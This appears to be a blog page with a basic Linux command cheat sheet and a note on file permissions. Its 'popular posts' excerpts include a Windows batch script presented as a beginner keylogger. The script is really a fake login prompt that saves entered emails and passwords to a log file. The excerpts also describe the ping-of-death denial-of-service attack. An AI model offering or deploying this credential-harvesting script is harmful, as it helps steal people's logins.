Skip to main content

Cheat sheet for linux

mkdir – make directories
Usage: mkdir [OPTION] DIRECTORY…
eg. mkdir lhnls – list directory contents
Usage: ls [OPTION]… [FILE]…
eg. ls, ls ­l, ls lhncd – changes directories
Usage: cd [DIRECTORY]
eg. cd lhnpwd ­-  print name of current working directory
Usage: pwdvim – Vi Improved, a programmers text editor
Usage: vim [OPTION] [file]…
eg. vim lhn.txtcp – copy files and directories
Usage: cp [OPTION]… SOURCE DEST
eg. cp sample.txt sample_copy.txt
cp sample_copy.txt target_dirmv – move (rename) files
Usage: mv [OPTION]… SOURCE DEST
eg. mv source.txt target_dir
mv old.txt new.txtrm ­ remove files or directories
Usage: rm [OPTION]… FILE…
eg. rm file1.txt , rm ­rf some_dirfind – search for files in a directory hierarchy
Usage: find [OPTION] [path] [pattern]
eg. find file1.txt, find ­name file1.txthistory – prints recently used commands
Usage: historycat – concatenate files and print on the standard output
Usage: cat [OPTION] [FILE]…
eg. cat file1.txt file2.txt
cat ­n file1.txtecho – display a line of text
Usage: echo [OPTION] [string] …
eg. echo I love India
echo $HOMEgrep ­- print lines matching a pattern
Usage: grep [OPTION] PATTERN [FILE]…
eg. grep ­i apple sample.txt wc ­- print the number of newlines, words, and bytes in files
Usage: wc [OPTION]… [FILE]…
eg.  wc file1.txt
wc ­L file1.txtsort – sort lines of text files
Usage: sort [OPTION]… [FILE]…
eg. sort file1.txt
sort ­r file1.txttar – to archive a file
Usage: tar [OPTION] DEST SOURCE
eg. tar ­cvf /home/archive.tar /home/original
tar ­xvf /home/archive.tarkill – to kill a process(using signal mechanism)
Usage: kill [OPTION] pid
eg. kill ­9 2275ps – report a snapshot of the current processes
Usage: ps [OPTION]
eg. ps,  ps ­elwho – show who is logged on
Usage: who [OPTION]
eg. who , who ­b , who ­qpasswd – update  a user’s authentication tokens(s)
Usage: passwd [OPTION]
eg. passwd su –  change user ID or become super­user
Usage: su [OPTION] [LOGIN]
eg. su remo, suchown – change file owner and group
Usage: chown [OPTION]… OWNER[:[GROUP]] FILE…
eg. chown remo myfile.txtchmod – change file access permissions
Usage: chmod [OPTION] [MODE] [FILE]
eg. chmod 744 calculate.shzip – package and compress (archive) files
Usage: zip [OPTION] DEST SOURSE
eg. zip original.zip originalunzip – list, test and extract compressed files in a ZIP archive
Usage: unzip filename
eg. unzip original.zissh – SSH client (remote login program)
“ssh is a program for logging into a remote machine and for
executing commands on a remote machine”
Usage: ssh [options] [user]@hostname
eg. ssh ­X guest@10.105.11.20scp – secure copy (remote file copy program)
“scp copies files between hosts on a network”
Usage: scp [options] [[user]@host1:file1] [[user]@host2:file2]
eg. scp file1.txt guest@10.105.11.20:~/Desktop/fdisk – partition manipulator
eg. sudo fdisk ­lmount – mount a file system
Usage: mount ­t type device dir
eg. mount /dev/sda5 /media/targetumount – unmount file systems
Usage: umount [OPTIONS] dir | device…
eg.  umount /media/targetdu – estimate file space usage
Usage:  du [OPTION]… [FILE]…
eg. dudf – report filesystem disk space usage
Usage: df [OPTION]… [FILE]…
eg. dfquota – display disk usage and limits
Usage: quota [OPTION]
eg. quota ­vreboot – reboot the system
Usage: reboot [OPTION]
eg. rebootpoweroff – power off the system
Usage: poweroff [OPTION]
eg. poweroffkate – KDE Advanced Text Editor
Usage:  kate [options][file(s)]
eg. kate file1.txt file2.txtvim – Vi Improved, a programmers text editor
Usage: vim [OPTION] [file]…
eg. vi hello.cgedit ­ A text Editor. Used to create and edit files.
Usage: gedit [OPTION] [FILE]…
eg. geditbg – make a foreground process to run in background
Usage: type ‘ctrl+z’  and then ‘bg ‘fg – to make background process as foreground process
Usage: fg [jobid]jobs – displays the names and ids of background jobs
Usage: jobssed ­  stream editor for filtering and transforming text
Usage: sed [OPTION] [input­file]…
eg. sed ‘s/love/hate/g’ loveletter.txtawk ­ pattern scanning and processing language
eg.  awk ­F: ‘{ print $1 }’ sample_awk.txtfind ­ search for files in a directory hierarchy
Usage: find [OPTION] [path] [pattern]
eg. find ­name file1.txtlocate – find or locate a file
Usage: locate [OPTION]… FILE…
eg. locate file1.txt

Related  Here is How You Can Encrypt your Facebook messages using Secret Conversations

Linux File Permissions

3 types of file permissions – read, write, execute10 bit format from ‘ls ­l’ command
1             2 3 4      5 6 7     8 9 10
file type    owner     group    others
eg. drwxrw­r­­   means owner has all three permissions,
group has read and write, others have only read
permissionread permission – 4, write – 2, execute ­1
eg. rwxrw­r­­   = 764
673    =   rw­rwx­wx

Comments

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file w...

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent f...

What is DNS

D NS stands for Domain Name System is used to as the medium to translate domain names to their respective IP addresses when a client initiates a request query. DNS stores the database of all the domain names and their IP addresses which are registered on the network. Most of us are quite familiar with the term DNS or Domain Name System. DNS can be thought of as an attendance register for various websites present over the internet. In the case of DNS, it maintains the database of all the websites Domain Names and their IP (Internet Protocol) addresses that are operational all over the world. Historical Notes The origins of DNS date back to the time of the ARPANET  when there were only a few computers to get an entry in the database. A HOSTS.TXT file was maintained by Stanford Research Institute, which constituted the data of all the machines, and was copied by all the host machines to remain updated. Jon Postel from the Information Sciences Institute requested Pau...